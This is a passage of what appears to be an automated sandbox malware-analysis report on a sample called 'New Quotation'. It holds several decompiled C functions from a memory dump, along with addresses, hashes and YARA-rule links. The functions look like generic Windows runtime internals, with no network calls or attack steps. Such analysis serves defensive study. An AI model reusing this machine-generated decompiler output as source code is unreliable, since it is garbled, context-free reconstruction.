						_t81 = _t80 + 0x90;
						E1D7E24D0(_t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E1D8146B0();
						if(_a4 != 0) {
							L1D7E2330(_t48, _t81);
						}
					} else {
						_t13 = _t80 + 0x98; // 0x98
						E1D7D754C(_v8 + 0xc, _t13);
						_t16 = _t80 + 0xb0; // 0xb0
						E1D7D754C(_v8 + 8, _t16);
						E1D7D77F9(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E1D7E24D0(_t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E1D7E24D0(_t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t7 = _t80 + 0x90; // 0x90
					E1D7E24D0(_t7);
				}
				return 0;
			}













                                                                                                                                                                                          0x1d7d7dc1
                                                                                                                                                                                          0x1d7d7dc3
                                                                                                                                                                                          0x1d7d7dc5
                                                                                                                                                                                          0x1d7d7dcf
                                                                                                                                                                                          0x1d7d7dd4
                                                                                                                                                                                          0x1d7d7e10
                                                                                                                                                                                          0x1d7d7e1a
                                                                                                                                                                                          0x1d831865
                                                                                                                                                                                          0x1d7d7e20
                                                                                                                                                                                          0x1d7d7e20
                                                                                                                                                                                          0x1d7d7e20
                                                                                                                                                                                          0x1d7d7e28
                                                                                                                                                                                          0x1d831874
                                                                                                                                                                                          0x1d831874
                                                                                                                                                                                          0x1d7d7e2f
                                                                                                                                                                                          0x1d7d7e3b
                                                                                                                                                                                          0x1d83187f
                                                                                                                                                                                          0x1d831884
                                                                                                                                                                                          0x1d83188b
                                                                                                                                                                                          0x1d83188b
                                                                                                                                                                                          0x1d831896
                                                                                                                                                                                          0x1d83189b
                                                                                                                                                                                          0x1d8318a2
                                                                                                                                                                                          0x1d8318a7
                                                                                                                                                                                          0x1d8318a9
                                                                                                                                                                                          0x1d8318aa
                                                                                                                                                                                          0x1d8318ab
                                                                                                                                                                                          0x1d8318b3
                                                                                                                                                                                          0x1d8318ba
                                                                                                                                                                                          0x1d8318ba
                                                                                                                                                                                          0x1d7d7e41
                                                                                                                                                                                          0x1d7d7e44
                                                                                                                                                                                          0x1d7d7e4d
                                                                                                                                                                                          0x1d7d7e55
                                                                                                                                                                                          0x1d7d7e5e
                                                                                                                                                                                          0x1d7d7e68
                                                                                                                                                                                          0x1d7d7e70
                                                                                                                                                                                          0x1d7d7e76
                                                                                                                                                                                          0x1d7d7e7b
                                                                                                                                                                                          0x1d7d7e81
                                                                                                                                                                                          0x1d7d7e87
                                                                                                                                                                                          0x1d7d7e8d
                                                                                                                                                                                          0x1d7d7e96
                                                                                                                                                                                          0x1d7d7e98
                                                                                                                                                                                          0x1d7d7e9f
                                                                                                                                                                                          0x1d7d7e9f
                                                                                                                                                                                          0x1d7d7ea4
                                                                                                                                                                                          0x1d7d7ea4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7d7ea6
                                                                                                                                                                                          0x1d7d7dd8
                                                                                                                                                                                          0x1d7d7dde
                                                                                                                                                                                          0x1d7d7de7
                                                                                                                                                                                          0x1d7d7df2
                                                                                                                                                                                          0x1d7d7df9
                                                                                                                                                                                          0x1d7d7df9
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: f3d86edbb4964f97e3b56b707406b4e7a9272309a859052c9d74130153479d5c
                                                                                                                                                                                          • Instruction ID: 9d8a7b6f6215ad37411b65f61228e57af5b5d13870baf582301dad67a54bc235
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3d86edbb4964f97e3b56b707406b4e7a9272309a859052c9d74130153479d5c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C316834A05AC6BEDB45DB78C880BE9F764BF02268F04825EC11D4B211C774BD49CBA3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D80FD40 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E1D80FD40(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = __edx + 0x00000007 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x184 + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E1D80FE18(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E1D7FBC50(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}

















                                                                                                                                                                                          0x1d80fd48
                                                                                                                                                                                          0x1d80fd4b
                                                                                                                                                                                          0x1d80fd4e
                                                                                                                                                                                          0x1d80fd57
                                                                                                                                                                                          0x1d8491fa
                                                                                                                                                                                          0x1d8491fa
                                                                                                                                                                                          0x1d84920b
                                                                                                                                                                                          0x1d849220
                                                                                                                                                                                          0x1d849220
                                                                                                                                                                                          0x1d849225
                                                                                                                                                                                          0x1d80fdf0
                                                                                                                                                                                          0x1d80fdf6
                                                                                                                                                                                          0x1d80fdf6
                                                                                                                                                                                          0x1d80fd5d
                                                                                                                                                                                          0x1d80fd66
                                                                                                                                                                                          0x1d80fd6c
                                                                                                                                                                                          0x1d80fd6f
                                                                                                                                                                                          0x1d80fd75
                                                                                                                                                                                          0x1d8491c8
                                                                                                                                                                                          0x1d80fe0b
                                                                                                                                                                                          0x1d80fe0b
                                                                                                                                                                                          0x1d80fe0b
                                                                                                                                                                                          0x1d80fd7b
                                                                                                                                                                                          0x1d80fd84
                                                                                                                                                                                          0x1d80fdf9
                                                                                                                                                                                          0x1d80fe05
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80fe05
                                                                                                                                                                                          0x1d80fd86
                                                                                                                                                                                          0x1d80fd8e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80fd97
                                                                                                                                                                                          0x1d80fd97
                                                                                                                                                                                          0x1d80fd9c
                                                                                                                                                                                          0x1d80fda7
                                                                                                                                                                                          0x1d8491d3
                                                                                                                                                                                          0x1d8491d9
                                                                                                                                                                                          0x1d8491d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8491d3
                                                                                                                                                                                          0x1d80fdb0
                                                                                                                                                                                          0x1d80fdb3
                                                                                                                                                                                          0x1d80fdb7
                                                                                                                                                                                          0x1d80fdb9
                                                                                                                                                                                          0x1d80fdbe
                                                                                                                                                                                          0x1d80fdee
                                                                                                                                                                                          0x1d80fdee
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80fdee
                                                                                                                                                                                          0x1d80fdc4
                                                                                                                                                                                          0x1d80fdc7
                                                                                                                                                                                          0x1d8491e1
                                                                                                                                                                                          0x1d8491e4
                                                                                                                                                                                          0x1d8491f1
                                                                                                                                                                                          0x1d8491f3
                                                                                                                                                                                          0x1d80fdeb
                                                                                                                                                                                          0x1d80fdeb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80fdeb
                                                                                                                                                                                          0x1d8491e7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8491e7
                                                                                                                                                                                          0x1d80fdd8
                                                                                                                                                                                          0x1d80fdd8
                                                                                                                                                                                          0x1d80fdda
                                                                                                                                                                                          0x1d80fde0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80fe14
                                                                                                                                                                                          0x1d80fe14
                                                                                                                                                                                          0x1d80fde2
                                                                                                                                                                                          0x1d80fde5
                                                                                                                                                                                          0x1d80fde9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d80fde9

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 931d08bb85ae22d6e0c222ce6d1ad0a02c3e9b6ce2305a6a1c01371c741d528e
                                                                                                                                                                                          • Instruction ID: feb93eeb37263b9cad5a265ff799d5acc60e5dec396e2e0a84d6c95ea1b81902
                                                                                                                                                                                          • Opcode Fuzzy Hash: 931d08bb85ae22d6e0c222ce6d1ad0a02c3e9b6ce2305a6a1c01371c741d528e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0931A336704209CFC725CF29D884AA6B7A6FFC5314B25C95EE85D8B215DB31E806CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7CDE45 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                          			E1D7CDE45(intOrPtr __ecx, intOrPtr _a4) {
				void* _v32;
				intOrPtr _v60;
				char _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr* _v88;
				intOrPtr _v92;
				void* _v96;
				void* _v100;
				void* _v104;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t63;
				intOrPtr* _t66;
				void* _t69;
				short* _t72;
				short _t74;
				intOrPtr _t75;
				intOrPtr* _t78;
				intOrPtr* _t83;
				intOrPtr* _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr* _t90;
				char _t94;
				void* _t107;
				intOrPtr _t112;
				char _t114;
				void* _t115;
				intOrPtr _t117;
				intOrPtr* _t118;
				intOrPtr _t119;
				intOrPtr* _t122;
				void* _t123;
				intOrPtr _t124;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr _t137;
				short* _t138;
				void* _t139;
				void* _t141;
				short* _t143;
				intOrPtr _t145;
				void* _t147;
				signed int _t152;
				signed int _t154;
				signed int _t155;

				_t63 =  *0x1d8c664c; // 0x18ef560
				_t112 = __ecx;
				L1D7D53C0(_t63 + 0x18);
				_t117 =  *0x1d8c664c; // 0x18ef560
				_t1 = _t117 + 0x10; // 0x18ef570
				_t132 = _t1;
				_t66 =  *_t132;
				while(_t66 != _t132) {
					_t2 = _t66 - 8; // -8
					_t143 = _t2;
					if( *((intOrPtr*)(_t143 + 4)) != _t112) {
						_t66 =  *_t66;
						continue;
					} else {
						asm("lock inc dword [esi+0x14]");
						_t130 =  *0x1d8c664c; // 0x18ef560
						E1D7D52F0(_t130 + 0x18, _t130 + 0x18);
						L4:
						_t72 = _t143;
						L5:
						return _t72;
					}
					L33:
				}
				_t4 = _t117 + 0x18; // 0x18ef578
				E1D7D52F0(_t117, _t4);
				_t69 = 0x18;
				_t143 = E1D7E5D90(_t117,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t69);
				if(_t143 == 0) {
					_t72 = 0;
					goto L5;
				} else {
					 *((intOrPtr*)(_t143 + 8)) = 0;
					 *((intOrPtr*)(_t143 + 0xc)) = 0;
					 *_t143 = 0x913;
					_t74 = 0x18;
					 *((short*)(_t143 + 2)) = _t74;
					_t75 =  *0x1d8c664c; // 0x18ef560
					 *((intOrPtr*)(_t143 + 4)) = _t112;
					 *((intOrPtr*)(_t143 + 0x14)) = 1;
					 *((intOrPtr*)(_t143 + 0x10)) = 0;
					L1D7E2330(_t75 + 0x18, _t75 + 0x18);
					_t137 =  *0x1d8c664c; // 0x18ef560
					_t12 = _t137 + 0x10; // 0x18ef570
					_t78 = _t12;
					_t118 =  *_t78;
					if(_t118 != _t78) {
						while(1) {
							_t138 = _t118 - 8;
							if( *((intOrPtr*)(_t138 + 4)) == _t112) {
								break;
							}
							_t118 =  *_t118;
							if(_t118 != _t78) {
								continue;
							} else {
								_t137 =  *0x1d8c664c; // 0x18ef560
								goto L8;
							}
							goto L33;
						}
						asm("lock inc dword [edi+0x14]");
						_t119 =  *0x1d8c664c; // 0x18ef560
						E1D7E24D0(_t119 + 0x18);
						E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t143);
						_t72 = _t138;
						goto L5;
					} else {
						L8:
						_t13 = _t78 + 4; // 0x18ef570
						_t133 =  *_t13;
						_t14 = _t143 + 8; // 0x8
						_t122 = _t14;
						if( *_t133 != _t78) {
							_t123 = 3;
							asm("int 0x29");
							_t154 = (_t152 & 0xfffffff8) - 0x4c;
							 *(_t154 + 0x48) =  *0x1d8cb370 ^ _t154;
							_push(_t112);
							_push(_t143);
							_t83 = _t133;
							_t114 = 0;
							_push(_t137);
							_v84 = _t83;
							_t139 = _t123;
							_t145 =  *((intOrPtr*)(_t83 + 0xc8));
							_v80 = _t145;
							E1D818F40( &_v72, 0, 0x30);
							_t86 =  *((intOrPtr*)(_t139 + 0x70));
							_t155 = _t154 + 0xc;
							_v88 = _t86;
							_t87 = _t86;
							if(_t87 == 0) {
								_push(5);
								 *((char*)(_t139 + 0x6a)) = 0;
								 *((intOrPtr*)(_t139 + 0x6c)) = 0;
								goto L15;
							} else {
								_t107 = _t87 - 1;
								if(_t107 != 0) {
									if(_t107 == 1) {
										_push(0xa);
										goto L15;
									} else {
										_t94 = 0;
									}
								} else {
									_push("true");
									L15:
									_pop(_t88);
									_v92 = _t88;
									if(_a4 == _t114 && _t145 != 0 && _t88 != 0xa &&  *((char*)(_t139 + 0x6b)) == 1) {
										L1D7E2330(_t88, _t145 + 0x1c);
										_t128 = _v84;
										 *((intOrPtr*)(_t128 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
										 *((intOrPtr*)(_t128 + 0x88)) =  *((intOrPtr*)(_t139 + 0x68));
										 *((intOrPtr*)(_t128 + 0x8c)) =  *((intOrPtr*)(_t139 + 0x6c));
										 *((intOrPtr*)(_t128 + 0x90)) = _v92;
										 *((intOrPtr*)(_t128 + 0x20)) = _t114;
										E1D7E24D0(_t145 + 0x1c);
									}
									_t124 = _v92;
									_t90 =  *((intOrPtr*)(_v84 + 0x20));
									_t133 =  *_t90;
									_v84 =  *((intOrPtr*)(_t90 + 4));
									 *((intOrPtr*)(_t155 + 0x28)) =  *((intOrPtr*)(_t139 + 0x68));
									_v72 = 0x30;
									 *((intOrPtr*)(_t155 + 0x24)) = _t124;
									_v60 =  *((intOrPtr*)(_t139 + 0x6c));
									asm("movsd");
									_v88 = _t133;
									_v76 = 0x30;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									if(_t133 != 0) {
										 *0x1d8c91e0(_t124, _v84,  &_v76,  &_v72);
										_t114 = _v88();
									}
									_t94 = _t114;
								}
							}
							_pop(_t141);
							_pop(_t147);
							_pop(_t115);
							return E1D814B50(_t94, _t115,  *(_t155 + 0x54) ^ _t155, _t133, _t141, _t147);
						} else {
							 *_t122 = _t78;
							 *((intOrPtr*)(_t122 + 4)) = _t133;
							 *_t133 = _t122;
							 *((intOrPtr*)(_t78 + 4)) = _t122;
							_t17 = _t137 + 0x18; // 0x18ef578
							E1D7E24D0(_t17);
							goto L4;
						}
					}
				}
				goto L33;
			}






















































                                                                                                                                                                                          0x1d7cde45
                                                                                                                                                                                          0x1d7cde50
                                                                                                                                                                                          0x1d7cde53
                                                                                                                                                                                          0x1d7cde58
                                                                                                                                                                                          0x1d7cde5e
                                                                                                                                                                                          0x1d7cde5e
                                                                                                                                                                                          0x1d7cde61
                                                                                                                                                                                          0x1d7cde63
                                                                                                                                                                                          0x1d7cde67
                                                                                                                                                                                          0x1d7cde67
                                                                                                                                                                                          0x1d7cde6d
                                                                                                                                                                                          0x1d82d69b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cde73
                                                                                                                                                                                          0x1d7cde73
                                                                                                                                                                                          0x1d7cde77
                                                                                                                                                                                          0x1d7cde81
                                                                                                                                                                                          0x1d7cde86
                                                                                                                                                                                          0x1d7cde86
                                                                                                                                                                                          0x1d7cde88
                                                                                                                                                                                          0x1d7cde8b
                                                                                                                                                                                          0x1d7cde8b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cde6d
                                                                                                                                                                                          0x1d7cde8c
                                                                                                                                                                                          0x1d7cde90
                                                                                                                                                                                          0x1d7cde97
                                                                                                                                                                                          0x1d7cdeaa
                                                                                                                                                                                          0x1d7cdeae
                                                                                                                                                                                          0x1d7cdf15
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cdeb0
                                                                                                                                                                                          0x1d7cdeb0
                                                                                                                                                                                          0x1d7cdeb8
                                                                                                                                                                                          0x1d7cdebb
                                                                                                                                                                                          0x1d7cdec0
                                                                                                                                                                                          0x1d7cdec1
                                                                                                                                                                                          0x1d7cdec5
                                                                                                                                                                                          0x1d7cdecd
                                                                                                                                                                                          0x1d7cded1
                                                                                                                                                                                          0x1d7cded8
                                                                                                                                                                                          0x1d7cdedb
                                                                                                                                                                                          0x1d7cdee0
                                                                                                                                                                                          0x1d7cdee6
                                                                                                                                                                                          0x1d7cdee6
                                                                                                                                                                                          0x1d7cdee9
                                                                                                                                                                                          0x1d7cdeed
                                                                                                                                                                                          0x1d82d6a2
                                                                                                                                                                                          0x1d82d6a2
                                                                                                                                                                                          0x1d82d6a8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82d6aa
                                                                                                                                                                                          0x1d82d6ae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82d6b0
                                                                                                                                                                                          0x1d82d6b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82d6b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82d6ae
                                                                                                                                                                                          0x1d82d6bb
                                                                                                                                                                                          0x1d82d6bf
                                                                                                                                                                                          0x1d82d6c9
                                                                                                                                                                                          0x1d82d6db
                                                                                                                                                                                          0x1d82d6e0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cdef3
                                                                                                                                                                                          0x1d7cdef3
                                                                                                                                                                                          0x1d7cdef3
                                                                                                                                                                                          0x1d7cdef3
                                                                                                                                                                                          0x1d7cdef6
                                                                                                                                                                                          0x1d7cdef6
                                                                                                                                                                                          0x1d7cdefb
                                                                                                                                                                                          0x1d7cdf1e
                                                                                                                                                                                          0x1d7cdf1f
                                                                                                                                                                                          0x1d7cdf29
                                                                                                                                                                                          0x1d7cdf33
                                                                                                                                                                                          0x1d7cdf37
                                                                                                                                                                                          0x1d7cdf38
                                                                                                                                                                                          0x1d7cdf39
                                                                                                                                                                                          0x1d7cdf3b
                                                                                                                                                                                          0x1d7cdf3d
                                                                                                                                                                                          0x1d7cdf40
                                                                                                                                                                                          0x1d7cdf44
                                                                                                                                                                                          0x1d7cdf46
                                                                                                                                                                                          0x1d7cdf52
                                                                                                                                                                                          0x1d7cdf56
                                                                                                                                                                                          0x1d7cdf5b
                                                                                                                                                                                          0x1d7cdf5e
                                                                                                                                                                                          0x1d7cdf61
                                                                                                                                                                                          0x1d7cdf65
                                                                                                                                                                                          0x1d7cdf67
                                                                                                                                                                                          0x1d7ce058
                                                                                                                                                                                          0x1d7ce05a
                                                                                                                                                                                          0x1d7ce05d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cdf6d
                                                                                                                                                                                          0x1d7cdf6d
                                                                                                                                                                                          0x1d7cdf70
                                                                                                                                                                                          0x1d82d6ea
                                                                                                                                                                                          0x1d82d6f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d82d6ec
                                                                                                                                                                                          0x1d82d6ec
                                                                                                                                                                                          0x1d82d6ec
                                                                                                                                                                                          0x1d7cdf76
                                                                                                                                                                                          0x1d7cdf76
                                                                                                                                                                                          0x1d7cdf78
                                                                                                                                                                                          0x1d7cdf78
                                                                                                                                                                                          0x1d7cdf79
                                                                                                                                                                                          0x1d7cdf80
                                                                                                                                                                                          0x1d7ce019
                                                                                                                                                                                          0x1d7ce024
                                                                                                                                                                                          0x1d7ce02c
                                                                                                                                                                                          0x1d7ce032
                                                                                                                                                                                          0x1d7ce03b
                                                                                                                                                                                          0x1d7ce045
                                                                                                                                                                                          0x1d7ce04b
                                                                                                                                                                                          0x1d7ce04e
                                                                                                                                                                                          0x1d7ce04e
                                                                                                                                                                                          0x1d7cdf8d
                                                                                                                                                                                          0x1d7cdf91
                                                                                                                                                                                          0x1d7cdf94
                                                                                                                                                                                          0x1d7cdf99
                                                                                                                                                                                          0x1d7cdfa0
                                                                                                                                                                                          0x1d7cdfab
                                                                                                                                                                                          0x1d7cdfb3
                                                                                                                                                                                          0x1d7cdfb7
                                                                                                                                                                                          0x1d7cdfbb
                                                                                                                                                                                          0x1d7cdfbc
                                                                                                                                                                                          0x1d7cdfc0
                                                                                                                                                                                          0x1d7cdfc8
                                                                                                                                                                                          0x1d7cdfc9
                                                                                                                                                                                          0x1d7cdfca
                                                                                                                                                                                          0x1d7cdfcd
                                                                                                                                                                                          0x1d7cdfe0
                                                                                                                                                                                          0x1d7cdfea
                                                                                                                                                                                          0x1d7cdfea
                                                                                                                                                                                          0x1d7cdfec
                                                                                                                                                                                          0x1d7cdfec
                                                                                                                                                                                          0x1d7cdf70
                                                                                                                                                                                          0x1d7cdff2
                                                                                                                                                                                          0x1d7cdff3
                                                                                                                                                                                          0x1d7cdff4
                                                                                                                                                                                          0x1d7cdfff
                                                                                                                                                                                          0x1d7cdefd
                                                                                                                                                                                          0x1d7cdefd
                                                                                                                                                                                          0x1d7cdeff
                                                                                                                                                                                          0x1d7cdf02
                                                                                                                                                                                          0x1d7cdf04
                                                                                                                                                                                          0x1d7cdf07
                                                                                                                                                                                          0x1d7cdf0b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7cdf0b
                                                                                                                                                                                          0x1d7cdefb
                                                                                                                                                                                          0x1d7cdeed
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 180a28471e932812598900f5c97159439a3ce2b11505330b7cc653e80ced2d1f
                                                                                                                                                                                          • Instruction ID: 5badf0a8fff9d19fa13f621b990ef582f5e24740c66cbc0c1723d00614b45b51
                                                                                                                                                                                          • Opcode Fuzzy Hash: 180a28471e932812598900f5c97159439a3ce2b11505330b7cc653e80ced2d1f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3631CEB2200642DFC325CF1CD894A6AB7B4FF89358B51892DE10A8B721DB75F842CBD1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D895D43 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E1D895D43(intOrPtr* __ecx, intOrPtr* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t51;
				intOrPtr* _t53;
				signed int _t58;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t66;
				signed int _t67;

				_v8 =  *0x1d8cb370 ^ _t67;
				_v16 =  *__edx;
				_t53 = __ecx;
				_v12 =  *((intOrPtr*)(__edx + 4));
				_t63 = E1D7E5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x1000);
				if(_t63 != 0) {
					do {
						_v20 = 0x1000;
						_push( &_v20);
						_push(_t63);
						_push( &_v24);
						_push(0);
						_push(0);
						_push( &_v16);
						_t64 = E1D813FE0();
						if(_t64 < 0) {
							goto L12;
						}
						asm("sbb ecx, ecx");
						_t62 = 0;
						_t58 =  !( ~(_v20 & 7)) & _v20;
						_v20 = _t58;
						_t66 = _t58 >> 3;
						if(_t66 == 0) {
							L9:
							_t19 = _t58 + 8; // 0x1008
							_t62 = _t19;
							if(_t62 <= 0x1000) {
								_t58 = _t62;
								 *((intOrPtr*)(_t63 + _t66 * 8)) =  *_t53;
								_t22 = _t53 + 4; // 0x8b55ff8b
								 *((short*)(_t63 + 4 + _t66 * 8)) =  *_t22;
								_v20 = _t58;
							}
							L11:
							_push(1);
							_push(_v24);
							_push(0);
							_push(0);
							_push(_t58);
							_push(_t63);
							_push( &_v16);
							_t64 = E1D814690();
							goto L12;
						}
						_t51 =  *_t53;
						do {
							if( *((intOrPtr*)(_t63 + _t62 * 8)) != _t51) {
								goto L8;
							}
							_t18 = _t53 + 4; // 0x8b55ff8b
							if( *((intOrPtr*)(_t63 + 4 + _t62 * 8)) ==  *_t18) {
								goto L11;
							}
							_t51 =  *_t53;
							L8:
							_t62 = _t62 + 1;
						} while (_t62 < _t66);
						goto L9;
						L12:
					} while (_t64 == 0xc0000001);
					E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t63);
					L14:
					return E1D814B50(_t64, _t53, _v8 ^ _t67, _t62, _t63, _t64);
				}
				_t64 = 0xc0000017;
				goto L14;
			}



















                                                                                                                                                                                          0x1d895d52
                                                                                                                                                                                          0x1d895d59
                                                                                                                                                                                          0x1d895d5c
                                                                                                                                                                                          0x1d895d62
                                                                                                                                                                                          0x1d895d7a
                                                                                                                                                                                          0x1d895d7e
                                                                                                                                                                                          0x1d895d8a
                                                                                                                                                                                          0x1d895d8d
                                                                                                                                                                                          0x1d895d94
                                                                                                                                                                                          0x1d895d95
                                                                                                                                                                                          0x1d895d99
                                                                                                                                                                                          0x1d895d9a
                                                                                                                                                                                          0x1d895d9c
                                                                                                                                                                                          0x1d895da1
                                                                                                                                                                                          0x1d895da7
                                                                                                                                                                                          0x1d895dab
